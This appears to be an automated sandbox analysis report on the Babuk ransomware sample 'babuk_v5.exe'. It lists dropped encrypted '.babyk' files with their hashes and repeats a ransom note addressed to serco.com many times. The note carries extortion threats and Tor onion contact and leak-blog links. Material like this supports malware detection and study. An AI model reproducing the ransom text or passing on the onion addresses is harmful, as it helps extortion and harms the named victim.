                                                                            SHA1:7001B038B1B95099C64E41E77DDCDE891805D891
                                                                            SHA-256:6F7DBD314E276AB7335B5234480353D2CE32825B68FB026038BCAE7B2589EF36
                                                                            SHA-512:662570F6576A958AB17D314AC3D844176868A9B0B66722FF95D13AE8D8ADDBF55962357D12D6F7D211F124BAEAEDE130C19B594386A78B423B8987C4C4BACDBF
                                                                            Malicious:false
                                                                            Preview: .....ddaJ$bw........2......_..i.]..O}......7.@.n<...'..K..)*z..\.+.V:...9\..*.bL...{.u.#..&.....z....y.e02b..C.h...K....:~?`..?....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\Settings\settings.dat.LOG1.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.980505504797296
                                                                            Encrypted:false
                                                                            SSDEEP:192:hWO5bLzI4zpIAM+LIMkBgo/6IpAlF58ahTgqtHrGlnd2+:wubBI7+6BgK2F5vHrGNdl
                                                                            MD5:3F7EE1D4736B2080BFF1D313711490AD
                                                                            SHA1:3D490CBC89C0E97481EEF460BB46124252948690
                                                                            SHA-256:9A32CD28DB36C5F2F26A994E192E22307EEEE76311A92BA8D43B5583C6BC3101
                                                                            SHA-512:B294C3674C618FBA7AC95176B287D48341E0A7F585338F97978A408D4F49EC797D4C7FB715F74E3479961CF9DB13FB673D50750B1C8D893E95B9EEB4D8B76CDA
                                                                            Malicious:false
                                                                            Preview: N....ps..V....e),..|.B...t..9.e...m.t.....=....K.{..1....p.......^......(.i.....tG1.A..].c=.+.DAk...U...[..b*.O..-.. }.....\...P..G..\...no.?.vk....s}.V..2.}b.aW.r..E..7..".q?.+..."Y@S..;J..v...FGg-...`.:...(tmR>,.e.bBgdD..o..U..A.l..?.q.....y]Sju~M."..-...?...hmh@...,..%$,...S......]..n...{...=...A.p..2..Y..v....~.._.F..XI..l.q.>....A..O4..|....L..Z.cN.'(......F.3.....f\/0....Q..a..N.G...M<,d..%PV0L..w...%........].!..n.]...j..tFI..I\....-.T.....[........7.;..........g]@l:62..-.{....ox.../..>@..t.4.z.....NI.f.n.z......#..B!...*y.8.=.APD.D..h\n.T...w2.|Hm;.6.Y#............m.:U.^..*..h.C..F.....!3g......\...._3a....]....\.GR&).e..]+.%..d..6A........F...8..=q....2................s#..26{.,....".iZ}....7...c!...,[i.eC..6b....<".\.b....g..b..YH.Z$a....m.B..~..d......0...&...T$G....oo..)...Y.C........../.......f{...E..5T..Ys.\...k.XX.....S...P.W'm......|....K`.)g~h......%9.r.b0...sg......w.....l.%5S.~"j...4.......u.*%.(.!ob...P.T.t.Mm.qo...A..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\Settings\settings.dat.LOG2.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.529509628727875
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlcBKeTUMxkFTqNhfF71Gs/6E6YtQAdlFb8Abh2fePAt8LUxNvEEn:MBKekY5HtQAPFQAbkfDt8L0vtn
                                                                            MD5:364A53EC2039DACD652143EB6F1D2B13
                                                                            SHA1:83E234CA80A485CD1C14D6347F51C4C04132FF2A
                                                                            SHA-256:219CDE1D662354A116DA468FA2051F63909920D6F16CA8753AA5898D94F7CE13
                                                                            SHA-512:931CB74895084ED51BE3F629683DD69BA1390F715616D7A177798D2178E52D1EDBF941EE5A087837E4426E660CC3AB9A623221A580CEF21822AE30B6C095CAC9
                                                                            Malicious:false
                                                                            Preview: ....&.X............B.....x...l...R..S6L.$.V....n!...PgA.{k,..w..,...y.\P.^.....M.oO..s.........j.8.`....L...L7.R.]..w~..4....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\Settings\settings.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.977098422581456
                                                                            Encrypted:false
                                                                            SSDEEP:96:MO27dQNGjxId8dJebDYfltAy5tEOrVIxQVfe4cbh2bBzM8VeeiEc9aoSp0m4P/tl:IR3gAzAIZIV4jbNDUeMspWP/19xqa
                                                                            MD5:E86321089A28C3F932A254A3F211BFEE
                                                                            SHA1:AE88E9BC951894754A613C6952C7A5DB6F06EEB6
                                                                            SHA-256:88278DA97E02CE35591DAA1EE29696583F4977E1B832A5A8A272C40934FB1EA6
                                                                            SHA-512:6382630177AD68536059B3249ECD8D2D343E5C7076DE5546509E6A325E48EA16E526B5E9928F2FAE0D796EB4DD9E31DBB72AF340140A88FBF7D625F4B06AE16B
                                                                            Malicious:false
                                                                            Preview: ....q.Q.p...j.S..\......{. 6...`......gs.Ty..L.9.6J..b..k.T.....=.tJ....z....2.p...$;h U....K...R..XU/..L.q....'dF...........M.E.o.../.`.._.....7.!...q..jx.......\.aq.A.5xQ.$<<....vt.Z.f.W...R..vH&..1.;./.G....6..MVvz.........EX;.;..d.@y3.'....9.1..Z.l.K...&Q...,.".c.....-...{..E..}l0...\@3..).....#k....y...o.....R.1.5....Zg....A.....y...a..E.V..%.:.W(.".........f.c.w.....U~.C..X.PZ'..1.......q..^...]........2...z..8....w%c\.....m.'n....{...v..T?..ci.!..c.O*....L......&...a..../.. ..q@.J.9.6..$.M.'...#._-.U2...]..CSC.W.97.T.J...K.;.Cz= ........s. .....<.........X.....0:2.h^...W86.k&h"...^%2.pN.y.<.C... 1ZS.x...S...r....4.<#r..._..C.=$\.hd..@.v.....#..&.$.. ..g.7,.%...@."f_,5s...PPD.....V4.S....Q......k.F...6..h.OG....p...g. n.rd\.....X.....J.......Ema8..x.d..x|.e.8....j.(.....`.?.h.[O.\..=1..N.5.f.)...m../W42ar.*.U|.4....ax...wR..V...x.....{.......r.=.. H..x.t.....]Z...T~..|......#......v.>..5.L....:.d..O.b...ag..2.<.....'.+.. q./.....
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\LocalCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\RoamingState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.447614241348031
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlNhtr40ZN4rElaD/+Jj1+28BPNcOLS6gTfAMy8qVXxrl/8LUxNvEEn:9hnQ4lI/yj17QP1sfAMvqRxx0L0vtn
                                                                            MD5:2459D6D721D4D88B6E54FEFF5F4B31DD
                                                                            SHA1:DF2F100FE2822A2241629D5C89B7FF7C82AAB170
                                                                            SHA-256:80447A8DABD8863609CEC971123E94C179D53D4D7C61F6BDBF6907081D79308E
                                                                            SHA-512:1FAC824CF704E76E8C43DEE71DAD9A1644BC65EA893969E5B4F4B742B861AEE7F38FA9315784625EE64212E91EAC8D95ACA138F3721FFDF183092D886A2AE855
                                                                            Malicious:false
                                                                            Preview: ....k..sC.. .m.A$..=..]......o....=.UG.t=@.&5]Z.6[bR...P.j.....N5.%..k0.Bw^.....1.x.#..G.j.....;(..u._...I............p..u........choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\Settings\settings.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.977746253867937
                                                                            Encrypted:false
                                                                            SSDEEP:192:Pfsy/yVUEdUm4bfBiReCEs6OaUyQuLoBLynQKPihN9mTKr:cyn8URfBiRe1dyQGr
                                                                            MD5:AA888B04A8FABEFF9E20E07D5D44E79B
                                                                            SHA1:A6B883E5BF61F3B04423D9303C6A35F20D192E10
                                                                            SHA-256:FFB5DFB548B24AA867BA257FC8DFCB7FBFA21BE86E60DA3156331E8451FFE46D
                                                                            SHA-512:10A95329D8D0A7787F0D17C3EE12779FA696AC0F09326A3DE0EC7432A0150C3F5B1B62B957665E30E7D84B7217CF87BDA50A4240210ADE94D43736558010FB43
                                                                            Malicious:false
